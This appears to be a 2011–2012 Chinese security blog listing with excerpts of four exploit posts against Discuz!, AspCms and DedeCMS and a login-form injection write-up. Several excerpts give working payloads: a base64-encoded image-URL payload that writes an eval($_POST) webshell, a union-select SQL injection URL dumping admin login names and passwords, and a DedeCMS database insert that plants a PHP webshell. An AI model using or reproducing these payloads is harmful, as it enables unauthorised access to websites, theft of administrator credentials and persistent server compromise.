DZ!2.5 后台拿 WebShell 方法!

分类:安全 | 2012-05-1 | 撸过 665 次
1人扯谈

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志)

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志,论坛根目录下生成demo.php,一句话密码C

这个必须是要开启seo

在这个地方。二个的都是这个地方。

最新更新的是能直接在贴子里面拿shell。。

利用方式也并非非得发blog,[......]

继续阅读

aspcms cookies欺骗和后台无验证注入

分类:安全 | 2012-02-11 | 撸过 1,997 次
1人扯谈

后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!

————————后台注射————————

 

http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3[......]

继续阅读

后台登陆框post注入

分类:安全 | 2011-12-12 | 撸过 845 次
0人扯谈

作者:knife

目录
0×00 踩点
0×01 寻找漏洞
0×02 利用漏洞
0×03 完结

0x00 踩点

再一次授权情况下 ,本人对骚狐 旗下某个站点发起了一次 友情的渗透

在不知道任何信息的情况下,本人先对骚狐的一些基本服务器信息做了了解

情况如下

服务器是:unix 系统

web版本:nginx/0.7.69

ip:xxx.xxx.xxx.xxx 用了反向代理

0x01 寻找漏洞

对于服务器 我暂时没有什么漏洞可以提权

web 版本 基于 nginx 早期 80sec 发过两个 解析漏洞

这里我们可以看下 当然这么大的一只狐狸怎么会干出这种傻事呢???

所以[......]

继续阅读

dedecms最新0day利用不进后台直接拿WEBSHELL

分类:安全 | 2011-08-11 | 撸过 1,243 次
0人扯谈

配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞

https://www.webshell.cc/313.html

webshell的方法如下:

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "[......]

继续阅读